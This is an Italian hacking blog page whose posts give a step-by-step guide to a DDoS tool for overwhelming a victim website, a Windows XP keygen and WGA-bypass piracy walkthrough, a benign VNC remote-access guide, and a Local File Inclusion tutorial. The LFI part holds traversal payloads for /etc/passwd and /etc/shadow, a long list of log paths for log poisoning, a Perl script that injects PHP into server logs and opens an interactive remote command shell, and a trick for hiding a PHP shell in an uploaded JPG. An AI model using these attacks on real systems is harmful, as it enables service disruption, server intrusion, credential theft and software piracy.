DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

Caricamento in corso...

Programma Lamer Ddos 5.5


Introduzione al programma: Ddos ( Distribuited Denial of Service ) 5.5 è un programma per sovraccaricare il server di un sito, aumentando le connessioni fino a fare esplodere il server

Esempio:
Il server di www.sitovittima.it può sostenere massimo 5000 connessioni attive, oi col nostro programma possiamo creare più connessioni, ad esempio il doppio, facendo rallentare drasticamente, e successivamente overlockare il server.


Questo è uno screen del programma:

SPOILER
image


E ora come funziona:

Premetto che non dovete seguire i numeri, i numeri sono solo il punto di riferimento per la descrizione. Successiavmente troverete la procedura passo a passo

1) Spazio dove Inserire L'url del sito per l'attacco
2) La porta (che poi vi spiegherò come trovarla)
3) Il numero di connessioni (che andranno a connettersi al server)
5) le connessioni attive al server (scusate se mi sono dimenticato il numero 4 )
6) Per Avviare il Ddos
____________________________________________

7) Dove inserire l'IP del sito da pingare
8) Il numero di Byte Per ping
9) Il numero di Ping al secondo
13) Avviare il Ping

______________________________________

10) Url del sito di cui volete trovare l'IP
11) Dove compare l'IP
12) tasto per far comparire l'IP (istantaneo)
____________________________________________________


Procediamo:

- Aprire il Ddos
- Inserire l'url del sito per trovare l'IP (ovvero punto 10-11-12)
- Effettuare l'attacco ping (incollare l'IP attraverso l'ip recuperato) inserire il ping in Byte (mettete 1000) e di thread mettete 75 Massimo, Il mio consiglio è mettere 75 per una memoria ram da almeno 512 mega. Lasciare che continui a effettuare l'attacco con i 75 Dos aperti, lasciatelo li.
- Dopo un po, effettuate l'attacco Ddos, come? allora IP mettete sempre quello che avete trovato prima, per quanto riguarda la porta basta fare tasto destro sul client se avete Internet explorer scegliete "Html" mentre se avete Firefox scegliete Sorgente Pagina, e andate a vedere a cosa corrisponde Info.Port=[Numero Porta] Di solito è la 21 o la 50 o la 80
- Connection: Partite da 100, quando in active connection sarà 100 allora aumentatela gradualmente 200 poi 250 poi 500 poi 700 poi 900 poi 1000 fino a quando il server non scoppia.


Download: Ddos 5.5

Non fate cazzate, usatelo a vostro rischio e pericolo! non mi assumo alcuna responsabilita

Guida a VNC e Real VNC

Per accedere in remoto a un altro PC



VNC (Virtual Network Computing) è un software di amministrazione remota.

Si divide in 2 moduli: server e client.

Per chiarire: il lato server è il PC che riceve "l'assistenza", quello client è il PC che si collega e "gestisce".

Innanzitutto scarichiamo i file, li trovate in giro per la rete...

Una volta downloadato , installiamo la parte Client e quella Server.


Lato Server.

Per collegare un PC al nostro computer apriamo il lato Server.



Impostiamo:

Accept socket connection: collega il server col client
Password: per inserire una password da parte dei client
Display number: forza il numero di connessione da utilizzare, o lo assegna automaticamente.
Disable local o remote keyboard & pointer: Abilita o disabilita l’utilizzo della tastiera e del puntatore locale o remoto.

Inserita la password premiamo OK e l'icona del server tornerà nella barra di Windows.



Quando un client si collega al nostro computer l'icona di Vnc da bianca diventa nera.

Ricordate di aprire le porte 5800 e 5900 in Tcp.

Lato Client.

Lanciamo Client da Run Vnc Viewer.

Nella finestra scriviamo l’indirizzo IP del PC server.



Clicchiamo ok dopo le opzioni e inseriamo la password che è stata impostata nel server.

Genuinizzare XP


Vi è mai capitato di comprare qualcosa, tipo un gioco del computer, inserire la chiave di attivazione e poi, puf! La chiave non andava bene?
A molta gente si, pero non con un gioco ma bensi con windows xp... Quidni vediamo in questa guida come rendere la nostra copia di windows (originale o non) autentica,questo vi permettera di scaricare aggiornamenti, e di usufruire dei programmi microsot.

1)Scarichiamo il pacchetto contenente tutto il necessario da questo indirizzo:

http://www.megaupload.com/?d=0XC9G13T

2)Una volta scaricato scompattiamo l’archivio

3)Aprite il file Windows XP Keygen.exe per calcolare un seriale valido e salvarlo da qualche parte. NB:funziona solo con Windows Xp Professional (con o senza service pack 2). Non vale per XP Home Edition. Se avete questo avrete bisogno di un seriale originale.

4)Eseguire il file Keyfinder.exe. Adesso verrà mostrato il vecchio seriale.
Per sostituirlo con il nuovo andate in : Options/Change Windows Key.

5)Inserire il seriale che prima avete calcolato e cliccare Change e OK

6)Aprire il programma WGA fix.exe e cliccare Si.

7)Esegui il programma MGADiad.exe e premi il tasto continue ( così verificherai se la tua copia è diventata genuina.)

8)Controlla il Validation Status, nella prima riga in alto. Se troverete scritto “Genuine” allora avrete la vostra copia di Windows Xp regolarmente valida e più il problema WGA.

LFI - Local File Inclusion


Iniziamo analizzando il codice vulnerabile:

Codice:
 

$page $_GET[page];

include($page);
?>

Vedendo questo codice risalta subito la vulnerabilità. Ovvero la variabile $page che non è parsata dal PHP.
Detto questo andiamo a “osservare” il comportamento dei vari URL nel Browser della vittima.

Mettiamo caso di avere il file “test.php” nella directory “prova
.
Per visualizzarne il contenuto dovremmo visitare il link seguente:

Codice:
 
www.vittima.it/prova/test.php

In questo modo visualizzeremo il contenuto della pagina “test.php”.

Supponiamo ora che il codice vulnerabile prima visualizzato sia presente nella Index e che la pagina “test.php” sia recuperabile attraverso la Index:

Codice:
 
www.vittima.it/index.php?page=prova/test.php

In questo modo visualizzerete la pagina “test.php” contenuta nella directory “prova”.

Ora vediamo come recuperare una pagina che si trova in una differente directory.
Immaginiamo che la pagina che vogliamo recuperare si trovi in:

Codice:
 
www.vittima.org/test.php

 Mentre la Index si trovi in:

Codice:
 
www.vittima.org/prova/index.php

In questo caso faremmo cosi:

Codice:
 
www.vittima.org/prova/index.php?page=../test.php


Spieghiamo un po la sintassi:
"..” Servono per scalare la directory.
"../..” Servono per scalare più directory, ovvero aggiungeremo una slash ogni due puntini per saltare in un altra directory.

Ora abbiamo appreso come spostarci nelle directory.
Nel caso il Server risiedesse su Server Unix possiamo visualizzare la pagina con le password del Server.

Codice:
 
www.vittima.org/index.php?page=../../../../../../../etc/passwd

I “../..” variano a seconda di dove si trovi il file vulnerabile.

Se riuscite a vedere la pagina noterete che le password non sono visibili (perchè oscurate o per mancanza di permessi).
Visualizzereste una cosa del genere:

Codice:
 
Username:password:UID:GID:full_name:directory:shell

Ovvero:

Codice:
 
Mionome:miapassword:503:100:FullName:/home/nome:/bin/sh

La password oscurata dal server appare come "x", che significa che la password è codificata nella directory "/etc/shadow" che però è visualizzabile solo se si è root.
Ma è possibile visualizzare una cosa simile qualche volta:

Codice:
 
Usernane:!:503:100:FullName:/home/nomeutente:/bin/sh

Il punto esclamativo al posto della password sta a significare che la password è contenuta nella directory "etc/security/"
Nel caso non sia cosi potrete trovare la password nelle seguenti directory:

Codice:
 
/etc/passwd

/etc/shadow

/etc/group

/etc/security/group

/etc/security/passwd

/etc/security/user

/etc/security/environ

/etc/security/limits

/usr/lib/security/mkuser.default

Ora vediamo un altro tipo di codice vulnerabile:

Codice:
 

$page $_GET["page"];

include("$page.php");
?>

In questo caso, alla fine del file si aggiunge ".php".
E questo verrà aggiunto a tutti i file che digiteremo nel browser.

Codice:
 
www.vittima.org/index.php?file=../../../../../../etc/password.php


(Notate il l'estensione del file)
Siccome probabilemente quel file non esiste, useremo il null byte:

00%

Che farà in modo di far ignorare al browser tutto quello che viene dopo di esso.


Altri modi di eseguire questa tecnica e quella di eseguire Comandi Sul Server iniettando codice PHP in HTTPD per poi provare ad accedere a essi tramite i LOG utilizzando la LFI.
I LOG li potete trovare in:

Codice:
 
../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

../../../../../../../etc/httpd/logs/acces_log

../../../../../../../etc/httpd/logs/acces.log

../../../../../../../etc/httpd/logs/error_log

../../../../../../../etc/httpd/logs/error.log

../../../../../../../var/www/logs/access_log

../../../../../../../var/www/logs/access.log

../../../../../../../usr/local/apache/logs/access_ log

../../../../../../../usr/local/apache/logs/access. log

../../../../../../../var/log/apache/access_log

../../../../../../../var/log/apache2/access_log

../../../../../../../var/log/apache/access.log

../../../../../../../var/log/apache2/access.log

../../../../../../../var/log/access_log

../../../../../../../var/log/access.log

../../../../../../../var/www/logs/error_log

../../../../../../../var/www/logs/error.log

../../../../../../../usr/local/apache/logs/error_l og

../../../../../../../usr/local/apache/logs/error.l og

../../../../../../../var/log/apache/error_log

../../../../../../../var/log/apache2/error_log

../../../../../../../var/log/apache/error.log

../../../../../../../var/log/apache2/error.log

../../../../../../../var/log/error_log

../../../../../../../var/log/error.log


Ora osserviamo i LOG trovati e vediamo cosa contengono.
In questo esempio si userà un LOG che memorizza "not found files" e il codice PHP

Codice:
 
passthru (\$_GET[cmd]) 
?>

Che precedentemente abbiamo inserito tramite Browser.
Questo potrebbe non funzionare perchè il Browser decodifica i caratteri speciali, e nel LOG troveremo:

Codice:
 
%3C?%20passthru(\$_GET[cmd])%20?>

Quindi in questo caso
 useremo uno Script scritto da d3fcrash:

Codice:
 
#!/usr/bin/perl -w

use IO::Socket;

use LWP::UserAgent;

$site="victim.com";

$path="/folder/";

$code="";

$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die

"\nConnection Failed.\n\n";

print $socket "GET ".$path.$code." HTTP/1.1\r\n";

print $socket "User-Agent: ".$code."\r\n";

print $socket "Host: ".$site."\r\n";

print $socket "Connection: close\r\n\r\n";

close($socket);

print "\nCode $code sucssefully injected in $log \n";

print "\nType command to run or exit to end: ";

$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die

"\nConnection Failed.\n\n";

   print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";

   print $socket "Host: ".$site."\r\n";

   print $socket "Accept: */*\r\n";

   print $socket "Connection: close\r\n\n";

   while ($show = <$socket>)

   {

      print $show;

   }

print "Type command to run or exit to end: ";

$cmd = ;

}

Fate un “Copia” e “Incolla” "whatever.pl"
Poi modificatelo dove ritenete sia giusto, e nel caso il sito sia vulnerabile vi chiderà di inserire un comando.

Local JPG Injection

Ultima cosa, ma non meno importante sarà quella di dare un occhiata su come il sito gestisce il
caricamento delle immagini.
E' necessario inserire il codice PHP che si desidera eseguire dentro l' immagine, per fare questo, basta usare un editor esadecimale preferito, o la possibiltà di utilizzare edjpgcom (tutto quello che dovete fare è cliccare sull' immagine con il tasto destro, selezionare Apri con..., selezionare l'immagine e digitare il codice).
Cosi avrete la vostra Shell.
Vi rimane di trovare  un form di Upload immagini, ed upparla nel server.

Dopo averlo trovato e aver caricato l'immagine trovate un errore (in modo da trovare il percorso del server):
Codice:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

in /home/sitefolder/public_html/includes/view.php on line 37


Se non si riesce a creare questo errore tornare al file "etc/password":

Codice:
 
Username:miapassword:503:100:Fullname:/home/Username:/bin/sh

Di solito è cosi.
Ritorniamo alla nostra immagine, clicchiamo con il tasto destro del mouse su di essa, ed
annotiamoci il nome del percorso del file:

Codice:
 
www.vittima.it/index.php=../../../../../../home/the_other_site_dir_/public_html/path_to_youe_avatar/avatar.jpg

E se lanciamo dal browser la path esatta della immagine, vedremo il suo risultato:

Codice:
 
www.sitovittima.org/index.php=../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg.